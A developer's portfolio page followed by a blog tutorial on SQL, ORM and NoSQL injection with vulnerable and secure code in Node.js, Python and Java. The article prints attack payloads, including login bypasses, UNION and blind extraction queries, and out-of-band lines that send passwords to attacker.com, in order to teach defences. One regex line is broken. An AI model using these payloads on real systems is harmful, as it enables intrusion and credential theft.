Bună! Sunt

Federico Calò

Sviluppatore Software | Divulgatore Tecnico

Creo applicazioni web moderne e strumenti digitali personalizzati per aiutare le attività a crescere attraverso l'innovazione tecnologica. La mia passione è unire informatica ed economia per generare valore reale.

Contactează-mă

Despre Mine

La mia passione per l'informatica è nata tra i banchi dell'Istituto Tecnico Commerciale di Maglie, dove ho scoperto il potere della programmazione e il fascino di creare soluzioni digitali. Fin da subito, ho capito che l'informatica non era solo codice, ma uno strumento straordinario per trasformare idee in realtà.

Durante gli studi superiori in Sistemi Informativi Aziendali, ho iniziato a intrecciare informatica ed economia, comprendendo come la tecnologia possa essere il motore della crescita per qualsiasi attività. Questa visione mi ha accompagnato all'Università degli Studi di Bari, dove ho conseguito la Laurea in Informatica, approfondendo le mie competenze tecniche e la mia passione per lo sviluppo software.

Oggi metto questa esperienza al servizio di imprese, professionisti e startup, creando soluzioni digitali su misura che automatizzano processi, ottimizzano risorse e aprono nuove opportunità di business. Perché la vera innovazione inizia quando la tecnologia incontra le esigenze reali delle persone.

Competențele Mele

Analisi Dati & Modelli Previsionali

Trasformo i dati in insights strategici con analisi approfondite e modelli predittivi per decisioni informate

Automatizarea Proceselor

Creo strumenti personalizzati che automatizzano operazioni ripetitive e liberano tempo per attività a valore aggiunto

Sisteme Personalizate

Sviluppo sistemi software su misura, dalle integrazioni tra piattaforme alle dashboard personalizzate

const federico = {
  nome: "Federico Calò",
  ruolo: "Sviluppatore Software",
  città: "Bari, Italia",
  missione: "Aiutare attraverso l'informatica",
  passioni: [
    "Codice Pulito",
    "Innovazione",
    "Crescita Continua"
  ]
};

Misiunea Mea

Credo fermamente che l'informatica sia lo strumento più potente per trasformare le idee in realtà e migliorare la vita delle persone.

Democratizarea Tehnologiei

La mia missione è rendere l'informatica accessibile a tutti: dalle piccole imprese locali alle startup innovative, fino ai professionisti che vogliono digitalizzare la propria attività. Ogni realtà merita di sfruttare le potenzialità del digitale.

Unirea IT și Economiei

Non è solo questione di scrivere codice: è capire come la tecnologia possa generare valore reale. Intrecciando competenze informatiche e visione economica, aiuto le attività a crescere, ottimizzare processi e raggiungere nuovi traguardi di efficienza e redditività.

Crearea de Soluții Personalizate

Ogni attività è unica, e così devono esserlo le soluzioni. Sviluppo strumenti personalizzati che rispondono alle esigenze specifiche di ciascun cliente, automatizzando processi ripetitivi e liberando tempo per ciò che conta davvero: far crescere il business.

Transformă-ți Afacerea cu Tehnologia

Che tu gestisca un negozio, uno studio professionale o un'azienda, posso aiutarti a sfruttare le potenzialità dell'informatica per lavorare meglio, più velocemente e in modo più intelligente.

Hai să Vorbim →

Unisciti alla Community

Entra nella community di sviluppatori dove discutiamo di software, AI, architettura e DevOps. Condividi idee, fai domande e cresci insieme a noi.

Canale

FC Dev Blog

Ricevi notifiche su nuovi articoli, serie complete, tips settimanali e tool in evidenza. Contenuti bilingui IT/EN direttamente nel tuo Telegram.

Nuovi articoli appena pubblicati
Tips e code snippets settimanali
Sondaggi sugli argomenti futuri

Iscriviti al Canale

Gruppo

FC Dev Community

Una community bilingue IT/EN per sviluppatori. Discussioni, Q&A, aiuto reciproco e networking con altri professionisti del settore.

Discussioni su articoli e tecnologie
Help coding e code review
Opportunità di lavoro e collaborazione

Unisciti al Gruppo

Topic di Discussione

Visualizza

Master SQL

RoadMap.sh

Novembre 2024

Visualizza

Oracle Certified Foundations Associate

Oracle

Ottobre 2024

Visualizza

People Leadership Credential

Connect

Settembre 2024

Linguaggi & Tecnologie

Java

Python

JavaScript

Angular

React

TypeScript

SQL

PHP

CSS/SCSS

Node.js

Docker

Git

💼

12/2024 - Presente

Custom Software Engineering Analyst

Accenture

Bari, Puglia, Italia · Ibrida Analisi e sviluppo di sistemi informatici attraverso l'utilizzo di Java e Quarkus in Health and Public Sector. Formazione continua su tecnologie moderne per la creazione di soluzioni software personalizzate ed efficienti e sugli agenti.

💼

06/2022 - 12/2024

Analista software e Back End Developer Associate Consultant

Links Management and Technology SpA

Esperienza nell'analisi di sistemi software as-is e flussi ETL utilizzando PowerCenter. Formazione completata su Spring Boot per lo sviluppo di applicazioni backend moderne e scalabili. Sviluppatore Backend specializzato in Spring Boot, con esperienza in progettazione di database, analisi, sviluppo e testing dei task assegnati.

💼

02/2021 - 10/2021

Programmatore software

Adesso.it (prima era WebScience srl)

Esperienza nell'analisi AS-IS e TO-BE, evoluzioni SEO ed evoluzioni website per migliorare le performance e l'engagement degli utenti.

🎓

2018 - 2025

Laurea in Informatica

Università degli Studi di Bari Aldo Moro

Bachelor's degree in Computer Science, focusing on software engineering, algorithms, and modern development practices.

📚

2013 - 2018

Diploma - Sistemi Informativi Aziendali

Istituto Tecnico Commerciale di Maglie

Technical diploma specializing in Business Information Systems, combining IT knowledge with business management.

Contactează-mă

Ai un proiect în minte? Hai să vorbim! Completează formularul și îți voi răspunde curând.

* Campi obbligatori. I tuoi dati saranno utilizzati solo per rispondere alla tua richiesta.

03 - Injecție SQL și validare a intrărilor: Securitate backend

Injecția SQL este una dintre cele mai vechi și mai periculoase vulnerabilități de pe web. Documentat pentru prima dată la sfârșitul anilor 1990 și încă în centrul încălcării catastrofale a datelor în prezent: în 2024, conform Verizon DBIR, injecțiile SQL și alte atacuri ale aplicațiilor web au provocat 26% din toate încălcările de date. Sunt așteptate mai multe în 2025 2.600 CVE legate de injecția SQL, în creștere de la 2.400 în 2024.

Nu este vorba doar de interogări SQL clasice. Astăzi amenințările se extind la injecție ORM pe TypeORM și Prisma, la Injecție NoSQL pe MongoDB și atacuri de a doua generație care exploatează datele deja prezente în baza de date. Acest articol analizează fiecare variantă cu cod vulnerabil și securizat în Node.js, Python și Java și oferă o strategie defensivă cuprinzătoare pentru backend.

Ce vei învăța

Anatomia completă a unei injecții SQL: UNION, oarbă, bazată pe timp, bazată pe erori, în afara benzii
Injecție SQL de ordinul doi: cum funcționează și de ce scapă de verificări superficiale
Injecție ORM pe TypeORM și Prisma cu exemple practice
Injecție NoSQL pe MongoDB cu operatori precum $ne și $regex
Instrucțiuni pregătite și interogări parametrizate în Node.js, Python și Java
Validarea intrărilor cu Zod (Node.js), Pydantic (Python) și Bean Validation (Java)
Întărirea bazelor de date și principiul cel mai mic privilegiu
Cum să utilizați SQLMap pentru a vă testa aplicațiile
Studii de caz reale: MOVEit Transfer, TSA FlyCASS, ResumeLooters

Anatomia unei injecții SQL

O injecție SQL are loc atunci când Intrările nevalide ale utilizatorului sunt concatenate direct într-o interogare SQL, permițând atacatorului să modifice logica interogării în sine. Problema fundamentală, arhitecturală: tratarea datelor ca cod executabil.

Să luăm în considerare cel mai simplu caz, o pagină de conectare în Node.js care construiește interogarea cu concatenare de șiruri:

// CODICE VULNERABILE - Node.js con mysql2
const express = require('express');
const mysql = require('mysql2/promise');

app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // VULNERABILE: concatenazione diretta di input utente
  const query = `SELECT * FROM users
    WHERE username = '${username}'
    AND password = '${password}'`;

  const [rows] = await db.execute(query);

  if (rows.length > 0) {
    res.json({ success: true, user: rows[0] });
  } else {
    res.status(401).json({ error: 'Credenziali non valide' });
  }
});

// ATTACCO: username = "admin' --"
// Query risultante:
// SELECT * FROM users
//   WHERE username = 'admin' --' AND password = '...'
// Il -- commenta il resto: accesso garantito senza password!

Cele cinci tipuri de injecție SQL

1. Clasic / Bazat pe UNION

Atacatorul folosește operatorul UNION pentru a adăuga o a doua interogare la rezultatele primei. Necesită ca răspunsul aplicației să includă datele de interogare:

-- Payload UNION-based: estrae utenti dalla tabella users
-- Input: id = 1 UNION SELECT username, password, NULL FROM users --

-- Query originale:
SELECT product_name, price, description FROM products WHERE id = 1

-- Query iniettata:
SELECT product_name, price, description FROM products WHERE id = 1
UNION SELECT username, password, NULL FROM users --

-- Prerequisito: stesso numero di colonne, tipi compatibili

2. Blind Boolean-Based

Aplicația nu afișează datele bazei de date, dar schimbă comportamentul (de exemplu, arată sau ascunde conținut) în funcție de adevărul/falsitatea condiției injectate. Atacatorul deduce informații bit cu bit:

-- Payload boolean-based: verifica se la prima lettera dell'utente e 'a'
-- Se la pagina risponde normalmente: condizione vera
-- Se la pagina e vuota: condizione falsa

-- Vero (pagina normale):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'

-- Falso (pagina vuota):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='b'

-- Automatizzabile con sqlmap o script custom per estrarre dati carattere per carattere

3. Orb bazat pe timp

Când aplicația nu modifică răspunsul într-un mod vizibil, atacatorul folosește funcții care provoacă întârzieri în baza de date pentru a deduce informații din timpul de răspuns:

-- MySQL: SLEEP() per estrarre informazioni dal timing
-- Se la risposta impiega 5 secondi: condizione vera
-- Se risponde subito: condizione falsa

-- Verifica se il database si chiama 'production':
GET /product?id=1 AND IF(
  (SELECT database())='production',
  SLEEP(5),
  0
) --

-- PostgreSQL equivalente con pg_sleep():
-- id=1; SELECT CASE WHEN (username='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users --

-- Microsoft SQL Server:
-- id=1; IF (SELECT COUNT(*) FROM users WHERE username='admin')>0 WAITFOR DELAY '0:0:5'--

4. Bazat pe erori

Atacatorul forțează baza de date să genereze mesaje de eroare care conțin date extrase. Acest lucru funcționează atunci când aplicația arată utilizatorului erori de bază de date (configurare greșită frecventă în mediile de dezvoltare prost configurate pentru producție):

-- MySQL error-based: extractvalue() genera un errore con il valore estratto
-- id=1 AND extractvalue(1, concat(0x7e, (SELECT database())))

-- Errore restituito all'utente:
-- ERROR 1105 (HY000): XPATH syntax error: '~production_db'
-- L'attaccante ottiene il nome del database dall'errore!

-- PostgreSQL: cast di tipo per forzare errore
-- id=1 AND cast((SELECT version()) as int)

-- Error: invalid input syntax for type integer:
-- "PostgreSQL 15.2 on x86_64-pc-linux-gnu"

5. În afara benzii (OOB)

Tehnica avansată care exfiltrează datele prin canale alternative (căutare DNS, cerere HTTP) mai degrabă decât prin răspunsul HTTP normal. Util când canalele în bandă sunt blocate:

-- MySQL OOB via DNS (richiede FILE privilege e outbound DNS):
-- id=1 AND load_file(concat('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\x'))

-- Microsoft SQL Server OOB via HTTP (xp_dirtree o sp_makewebtask):
-- id=1; EXEC master..xp_dirtree '\\attacker.com\' + (SELECT TOP 1 password FROM users) + '\share'

-- L'attaccante vede la richiesta nei log DNS di attacker.com:
-- admin:5f4dcc3b5aa765d61d8327deb882cf99.attacker.com

Injecție SQL de ordinul doi: amenințarea ascunsă

La injecție SQL de ordinul doi (sau injecția SQL stocată) este una dintre cele mai insidioase vulnerabilități, deoarece scapă de verificările standard de securitate. Sarcina utilă nu este executată imediat după inserare, dar este salvate în baza de date si apoi preluat și utilizat într-o interogare ulterioară fără igienizare adecvată.

Acest scenariu este deosebit de periculos deoarece: codul de inserare poate fi corect și sigur, dar codul de citire și utilizare este vulnerabil. Testele de penetrare la suprafață o scapă adesea.

// SCENARIO: registrazione utente e cambio password

// FASE 1 - Registrazione (apparentemente sicura con prepared statement)
app.post('/register', async (req, res) => {
  const { username, password } = req.body;

  // Usa prepared statement - sembra sicuro!
  await db.execute(
    'INSERT INTO users (username, password) VALUES (?, ?)',
    [username, hash(password)]
  );
  // L'attaccante si registra con username: admin'--
  // Salvato correttamente nel DB come stringa: admin'--
});

// FASE 2 - Cambio password (VULNERABILE: costruisce query con dato dal DB)
app.post('/change-password', async (req, res) => {
  const userId = req.session.userId;

  // Recupera username dal DB (sembra "sicuro" perchè viene dal nostro DB)
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username; // = "admin'--"

  const { newPassword } = req.body;

  // VULNERABILE: concatena username recuperato dal DB
  const query = `UPDATE users SET password = '${hash(newPassword)}'
    WHERE username = '${username}'`;
  // Query risultante:
  // UPDATE users SET password = 'newhash' WHERE username = 'admin'--'
  // Aggiorna la password dell'admin, non dell'attaccante!

  await db.execute(query);
});

// SOLUZIONE: usa parameterized query ANCHE quando i dati vengono dal DB
app.post('/change-password-safe', async (req, res) => {
  const userId = req.session.userId;
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username;
  const { newPassword } = req.body;

  // SICURO: prepared statement anche per dati interni
  await db.execute(
    'UPDATE users SET password = ? WHERE username = ?',
    [hash(newPassword), username]
  );
});

Regula de aur pentru injecția de ordinul doi

Tratați ÎNTOTDEAUNA datele care provin din baza de date ca nefiind de încredere, mai ales dacă a fost postat inițial de utilizatori. Doar pentru că ceva provine din baza ta de date nu îl face în mod automat sigur pentru utilizare într-o interogare. Utilizați întotdeauna interogări parametrizate, indiferent de sursa de date.

Interogări parametrizate: Apărarea principală

I declarații pregătite (sau interogările parametrizate) sunt cea mai eficientă măsură împotriva injectării SQL. Principiul este simplu: structura de interogare este trimisă în baza de date separat din date, în două faze distincte. Baza de date alcătuiește planul de execuție înainte de a primi datele, care, prin urmare, nu pot schimba logica interogării.

Node.js cu mysql2

// SICURO: parameterized queries con mysql2
const mysql = require('mysql2/promise');

const pool = mysql.createPool({
  host: process.env.DB_HOST,
  user: process.env.DB_USER,
  password: process.env.DB_PASSWORD,
  database: process.env.DB_NAME,
  // Opzione di sicurezza: disabilita multiple statements
  multipleStatements: false,
});

// Login sicuro
async function loginUser(username, password) {
  // Il ? e un placeholder: mysql2 gestisce l'escaping automaticamente
  const [rows] = await pool.execute(
    'SELECT id, username, role FROM users WHERE username = ? AND password = ?',
    [username, hashPassword(password)]
  );
  return rows[0] || null;
}

// Ricerca con LIKE sicura
async function searchProducts(searchTerm, category, limit = 20) {
  // Anche i wildcard % devono essere nel parametro, non nella query
  const likeTerm = `%${searchTerm}%`;
  const [rows] = await pool.execute(
    `SELECT id, name, price FROM products
     WHERE name LIKE ? AND category = ?
     LIMIT ?`,
    [likeTerm, category, limit]
  );
  return rows;
}

// Inserimento sicuro con validazione
async function createUser(userData) {
  const { username, email, password, role = 'user' } = userData;

  // Whitelist per il campo role (non parametrizzabile come identifier)
  const allowedRoles = ['user', 'moderator'];
  if (!allowedRoles.includes(role)) {
    throw new Error('Ruolo non valido');
  }

  const [result] = await pool.execute(
    'INSERT INTO users (username, email, password_hash, role) VALUES (?, ?, ?, ?)',
    [username, email, hashPassword(password), role]
  );
  return result.insertId;
}

Python cu psycopg2 (PostgreSQL)

# SICURO: parameterized queries con psycopg2
import psycopg2
import psycopg2.extras
from contextlib import contextmanager

@contextmanager
def get_db_connection():
    conn = psycopg2.connect(
        host=os.environ['DB_HOST'],
        database=os.environ['DB_NAME'],
        user=os.environ['DB_USER'],
        password=os.environ['DB_PASSWORD']
    )
    try:
        yield conn
    finally:
        conn.close()

def get_user_by_id(user_id: int) -> dict | None:
    """
    Usa %s come placeholder (NON f-string o format()).
    psycopg2 gestisce l'escaping dei parametri in modo sicuro.
    """
    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            # Corretto: placeholder %s con tupla di parametri
            cur.execute(
                "SELECT id, username, email, role FROM users WHERE id = %s",
                (user_id,)  # Nota la virgola: deve essere una tupla
            )
            return cur.fetchone()

def search_users(filters: dict) -> list[dict]:
    """
    Costruzione dinamica sicura di query con parametri multipli.
    Evita di costruire SQL dinamico con concatenazione.
    """
    conditions = []
    params = []

    if 'username' in filters:
        conditions.append("username ILIKE %s")
        params.append(f"%{filters['username']}%")

    if 'role' in filters:
        # Whitelist per valori enumerati
        allowed_roles = {'user', 'admin', 'moderator'}
        if filters['role'] not in allowed_roles:
            raise ValueError(f"Ruolo non valido: {filters['role']}")
        conditions.append("role = %s")
        params.append(filters['role'])

    where_clause = " AND ".join(conditions) if conditions else "TRUE"
    query = f"SELECT id, username, email, role FROM users WHERE {where_clause}"

    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            cur.execute(query, params)
            return cur.fetchall()

# SBAGLIATO - Non fare mai questo:
# cur.execute(f"SELECT * FROM users WHERE id = {user_id}")  # f-string = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = " + str(user_id))  # concatenazione = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = %s" % user_id)  # % formatting = vulnerabile

Java cu JDBC PreparedStatement

// SICURO: PreparedStatement con JDBC in Java
import java.sql.*;
import java.util.Optional;

public class UserRepository {

    private final DataSource dataSource;

    public UserRepository(DataSource dataSource) {
        this.dataSource = dataSource;
    }

    // SICURO: PreparedStatement parametrizzato
    public Optional<User> findByUsername(String username) {
        String sql = "SELECT id, username, email, role FROM users WHERE username = ?";

        try (Connection conn = dataSource.getConnection();
             PreparedStatement stmt = conn.prepareStatement(sql)) {

            stmt.setString(1, username);  // Parametro 1-indexed
            ResultSet rs = stmt.executeQuery();

            if (rs.next()) {
                return Optional.of(new User(
                    rs.getLong("id"),
                    rs.getString("username"),
                    rs.getString("email"),
                    rs.getString("role")
                ));
            }
            return Optional.empty();
        } catch (SQLException e) {
            throw new DatabaseException("Errore nella ricerca utente", e);
        }
    }

    // Inserimento sicuro con transazione
    public long createUser(String username, String email, String passwordHash) {
        String sql = "INSERT INTO users (username, email, password_hash, created_at) " +
                     "VALUES (?, ?, ?, NOW())";

        try (Connection conn = dataSource.getConnection()) {
            conn.setAutoCommit(false);

            try (PreparedStatement stmt = conn.prepareStatement(
                    sql, Statement.RETURN_GENERATED_KEYS)) {

                stmt.setString(1, username);
                stmt.setString(2, email);
                stmt.setString(3, passwordHash);
                stmt.executeUpdate();

                conn.commit();

                ResultSet keys = stmt.getGeneratedKeys();
                if (keys.next()) {
                    return keys.getLong(1);
                }
                throw new DatabaseException("Impossibile ottenere ID generato");
            } catch (SQLException e) {
                conn.rollback();
                throw new DatabaseException("Errore creazione utente", e);
            }
        } catch (SQLException e) {
            throw new DatabaseException("Errore connessione database", e);
        }
    }

    // SBAGLIATO - Statement.execute() con concatenazione:
    // String sql = "SELECT * FROM users WHERE username = '" + username + "'";
    // stmt.execute(sql);  // MAI fare questo!
}

Injecția ORM: Când „Sigur” nu este suficient

Mulți dezvoltatori cred în mod eronat că utilizarea unui ORM (Object-Relational Mapper) elimină automat riscul injectării SQL. În realitate, conform unui studiu din 2025, Peste 30% dintre aplicațiile care utilizează ORM conțin încă vulnerabilități de injectare SQL din cauza modelelor de utilizare incorecte. Să ne uităm la cele mai frecvente cazuri.

TypeORM: Interogări brute și QueryBuilder

// TypeORM - Pattern VULNERABILI vs SICURI

import { DataSource, Repository } from 'typeorm';
import { User } from './entities/User';

// VULNERABILE 1: query() con interpolazione di stringa
async function findUserVulnerable(username: string) {
  const result = await dataSource.query(
    `SELECT * FROM users WHERE username = '${username}'`
    // Se username = "admin' OR '1'='1", bypass immediato!
  );
  return result;
}

// SICURO 1: query() con parametri posizionali
async function findUserSafe(username: string) {
  const result = await dataSource.query(
    'SELECT id, username, email FROM users WHERE username = $1',
    [username]  // Parametri come array separato
  );
  return result;
}

// VULNERABILE 2: QueryBuilder con where() e interpolazione
async function searchUserVulnerable(role: string, search: string) {
  return await dataSource
    .createQueryBuilder(User, 'user')
    .where(`user.role = '${role}' AND user.username LIKE '%${search}%'`)
    // Interpolazione diretta = SQL injection!
    .getMany();
}

// SICURO 2: QueryBuilder con parametri nominati
async function searchUserSafe(role: string, search: string) {
  // Whitelist per campi enumerati come role
  const allowedRoles = ['user', 'admin', 'moderator'] as const;
  if (!allowedRoles.includes(role as any)) {
    throw new Error('Ruolo non valido');
  }

  return await dataSource
    .createQueryBuilder(User, 'user')
    .where('user.role = :role AND user.username LIKE :search', {
      role,                    // Parametro nominato :role
      search: `%${search}%`  // Il % viene nel parametro, non nella query
    })
    .select(['user.id', 'user.username', 'user.email'])
    .getMany();
}

// SICURO 3: Repository API (il modo più sicuro con TypeORM)
async function findUsersByRoleSafe(
  userRepository: Repository<User>,
  role: string
) {
  return await userRepository.findBy({ role });
  // TypeORM genera automaticamente query parametrizzate
}

// SICURO 4: find() con condizioni complesse
async function findActiveUsersSafe(
  userRepository: Repository<User>
) {
  return await userRepository.find({
    where: {
      isActive: true,
      role: 'user'
    },
    select: {
      id: true,
      username: true,
      email: true
    },
    take: 100  // Limita i risultati
  });
}

Prism: Cazul $queryRaw

Prisma este în general considerat sigur pentru interogări standard, dar metode $queryRaw e $executeRaw necesită o atenție specială. Cercetările din 2025 au arătat că Prisma poate fi vulnerabilă la atacuri bazat pe timp prin operatori JSON și funcții de bază de date.

// Prisma - Pattern VULNERABILI vs SICURI

import { PrismaClient } from '@prisma/client';

const prisma = new PrismaClient();

// VULNERABILE: $queryRaw con template literal non sicuro
async function getUserVulnerable(userId: string) {
  // MAI usare $queryRawUnsafe con input utente!
  const result = await prisma.$queryRawUnsafe(
    `SELECT * FROM users WHERE id = ${userId}`
    // userId = "1 OR 1=1" bypassa il filtro!
  );
  return result;
}

// SICURO 1: $queryRaw con tagged template literals
// Prisma parametrizza automaticamente le interpolazioni nel tagged template
async function getUserSafe(userId: number) {
  // Nota: usa Prisma.sql template tag, NON stringa normale
  const result = await prisma.$queryRaw`
    SELECT id, username, email FROM users WHERE id = ${userId}
  `;
  // Prisma converte ${userId} in un parametro preparato automaticamente
  return result;
}

// SICURO 2: Usa l'API standard di Prisma quando possibile
async function getUserWithOrders(userId: number) {
  return await prisma.user.findUnique({
    where: { id: userId },
    select: {
      id: true,
      username: true,
      email: true,
      orders: {
        where: { status: 'active' },
        take: 10
      }
    }
  });
  // Completamente sicuro: Prisma genera prepared statements
}

// ATTENZIONE: Prisma findMany con where esposto all'utente
// VULNERABILE: ORM Leak - espone troppi dati
async function searchUsersVulnerable(userFilter: any) {
  return await prisma.user.findMany({
    where: userFilter,  // L'utente controlla il where = ORM Leak!
    // Un attaccante può usare: { password: { startsWith: 'a' } }
    // Per estrarre la password carattere per carattere (timing attack)
  });
}

// SICURO: schema di validazione strict per i filtri
import { z } from 'zod';

const UserSearchSchema = z.object({
  username: z.string().max(50).optional(),
  email: z.string().email().optional(),
  role: z.enum(['user', 'moderator']).optional(),
});

async function searchUsersSafe(rawFilter: unknown) {
  // Valida e trasforma il filtro con schema strict
  const validFilter = UserSearchSchema.parse(rawFilter);

  return await prisma.user.findMany({
    where: validFilter,  // Solo campi consentiti e validati
    select: {          // Seleziona esplicitamente i campi
      id: true,
      username: true,
      email: true,
      role: true,
    },
    take: 50,
  });
}

Injecție NoSQL: MongoDB și operatori periculoși

Aplicațiile care folosesc baze de date NoSQL precum MongoDB nu sunt imune la injecții. Atacurile NoSQL exploatează operatori de interogare a bazei de date (cum ar fi $ne, $gt, $regex) pentru a modifica logica interogării. Vectorul de atac tipic este un corp JSON malformat într-o solicitare HTTP.

// MongoDB con Mongoose - VULNERABILE
const express = require('express');
const User = require('./models/User');

// VULNERABILE: usa direttamente req.body come query MongoDB
app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // Se il body e: { "username": { "$ne": null }, "password": { "$ne": null } }
  // La query diventa: WHERE username != null AND password != null
  // Ritorna il PRIMO utente nel DB, bypass completo!
  const user = await User.findOne({ username, password });

  if (user) {
    res.json({ token: generateToken(user) });
  } else {
    res.status(401).json({ error: 'Non autorizzato' });
  }
});

// Payload di attacco (come JSON body):
// {
//   "username": { "$ne": null },
//   "password": { "$ne": null }
// }

// Altri payload comuni:
// { "username": { "$regex": ".*" } }    -- match qualsiasi username
// { "password": { "$gt": "" } }          -- password > stringa vuota (sempre vero)
// { "username": { "$in": ["admin", "root", "administrator"] } }

// MongoDB con Mongoose - SICURO

const express = require('express');
const mongoose = require('mongoose');
const mongoSanitize = require('express-mongo-sanitize');
const { z } = require('zod');
const bcrypt = require('bcrypt');

// 1. Middleware globale di sanitizzazione
app.use(mongoSanitize({
  replaceWith: '_',  // Sostituisce $ con _ negli operatori
  onSanitizeError(req, res) {
    res.status(400).json({ error: 'Input non valido' });
  }
}));

// 2. Schema Zod per validazione strict del tipo
const LoginSchema = z.object({
  username: z.string().min(3).max(50).regex(/^[a-zA-Z0-9_]+$/),
  password: z.string().min(8).max(128),
});

// SICURO: validazione + hashing password + nessuna query con password in chiaro
app.post('/login', async (req, res) => {
  try {
    // Valida il tipo: username e password DEVONO essere stringhe
    const { username, password } = LoginSchema.parse(req.body);

    // Cerca per username (stringa validata, non oggetto)
    const user = await User.findOne({ username }).select('+password');

    if (!user) {
      // Tempo di risposta costante per prevenire timing attacks
      await bcrypt.compare(password, '$2b$10$placeholder.hash.here.for.timing');
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    // Verifica password con bcrypt (non in chiaro nel DB)
    const isValid = await bcrypt.compare(password, user.password);
    if (!isValid) {
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    res.json({ token: generateToken(user) });
  } catch (error) {
    if (error instanceof z.ZodError) {
      return res.status(400).json({ error: 'Formato input non valido' });
    }
    // Non esporre dettagli dell'errore interno
    res.status(500).json({ error: 'Errore del server' });
  }
});

// 3. Mongoose schema con strict mode (default: true)
const userSchema = new mongoose.Schema({
  username: { type: String, required: true, unique: true },
  email: { type: String, required: true },
  password: { type: String, required: true, select: false },
  role: { type: String, enum: ['user', 'admin', 'moderator'], default: 'user' }
}, {
  strict: true,  // Ignora campi non definiti nello schema
  // sanitizeFilter: true  // Mongoose 6+: sanitizza automaticamente i query operator
});

// 4. Usa sanitizeFilter per query che accettano filtri utente
const UserModel = mongoose.model('User', userSchema);

async function findUsersByFilter(rawFilter) {
  // sanitizeFilter: true nel modello previene ORM injection
  // oppure usa questo approccio esplicito:
  return await UserModel.find(rawFilter).sanitizeFilter(true);
}

Validarea intrării: Prima linie de apărare

Interogările parametrizate protejează împotriva injectării SQL, darvalidarea intrărilor este prima barieră defensivă și reduce semnificativ suprafața de atac. Validarea robustă urmează principiul lista de permise (specificați ce este permis) mai degrabă decât lista de blocare (specificați ce este interzis).

Zod pentru Node.js/TypeScript

// Input validation con Zod - Node.js/TypeScript
import { z } from 'zod';

// Schema riutilizzabile per parametri comuni
const IdSchema = z.coerce.number().int().positive().max(2147483647);

const PaginationSchema = z.object({
  page: z.coerce.number().int().min(1).default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sortBy: z.enum(['created_at', 'username', 'email']).default('created_at'),
  sortOrder: z.enum(['asc', 'desc']).default('desc'),
});

// Schema per creazione utente
const CreateUserSchema = z.object({
  username: z
    .string()
    .min(3, 'Username troppo corto')
    .max(50, 'Username troppo lungo')
    .regex(/^[a-zA-Z0-9_-]+$/, 'Caratteri non consentiti nell\'username'),
  email: z
    .string()
    .email('Formato email non valido')
    .max(255),
  password: z
    .string()
    .min(8, 'Password troppo corta')
    .max(128, 'Password troppo lunga')
    .regex(
      /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])/,
      'La password deve contenere maiuscole, minuscole, numeri e caratteri speciali'
    ),
  role: z.enum(['user', 'moderator']).default('user'),
});

// Middleware di validazione generico per Express
function validateBody<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Dati non validi',
        details: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
        })),
      });
    }
    req.body = result.data;  // Sostituisce con dati validati e tipizzati
    next();
  };
}

function validateQuery<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.query);
    if (!result.success) {
      return res.status(400).json({
        error: 'Parametri query non validi',
        details: result.error.issues,
      });
    }
    req.validatedQuery = result.data;
    next();
  };
}

// Uso nei router
app.post('/api/users',
  validateBody(CreateUserSchema),
  async (req, res) => {
    // req.body e ora tipizzato e validato
    const user = await createUser(req.body);
    res.status(201).json({ id: user.id });
  }
);

app.get('/api/products',
  validateQuery(PaginationSchema),
  async (req, res) => {
    const { page, limit, sortBy, sortOrder } = req.validatedQuery;
    const products = await getProducts(page, limit, sortBy, sortOrder);
    res.json(products);
  }
);

Pydantic pentru Python/FastAPI

# Input validation con Pydantic v2 - Python/FastAPI
from pydantic import BaseModel, Field, field_validator, EmailStr
from typing import Literal
from enum import Enum
import re

class UserRole(str, Enum):
    user = "user"
    moderator = "moderator"
    admin = "admin"

class CreateUserRequest(BaseModel):
    username: str = Field(
        min_length=3,
        max_length=50,
        description="Username alfanumerico"
    )
    email: EmailStr
    password: str = Field(min_length=8, max_length=128)
    role: UserRole = UserRole.user

    @field_validator('username')
    @classmethod
    def username_alphanumeric(cls, v: str) -> str:
        if not re.match(r'^[a-zA-Z0-9_-]+, v):
            raise ValueError('Username deve contenere solo lettere, numeri, _ e -')
        return v.lower()

    @field_validator('password')
    @classmethod
    def password_strength(cls, v: str) -> str:
        if not re.search(r'[A-Z]', v):
            raise ValueError('La password deve contenere almeno una maiuscola')
        if not re.search(r'[a-z]', v):
            raise ValueError('La password deve contenere almeno una minuscola')
        if not re.search(r'\d', v):
            raise ValueError('La password deve contenere almeno un numero')
        if not re.search(r'[@$!%*?&]', v):
            raise ValueError('La password deve contenere almeno un carattere speciale')
        return v

    model_config = {
        "str_strip_whitespace": True,  # Rimuove spazi iniziali/finali
        "str_max_length": 500,         # Limite globale lunghezza stringhe
    }

class PaginationParams(BaseModel):
    page: int = Field(default=1, ge=1, le=10000)
    limit: int = Field(default=20, ge=1, le=100)
    sort_by: Literal['created_at', 'username', 'email'] = 'created_at'
    sort_order: Literal['asc', 'desc'] = 'desc'

# FastAPI endpoint con validazione automatica
from fastapi import FastAPI, HTTPException
app = FastAPI()

@app.post("/api/users", status_code=201)
async def create_user(user_data: CreateUserRequest):
    # Pydantic ha già validato tutti i campi
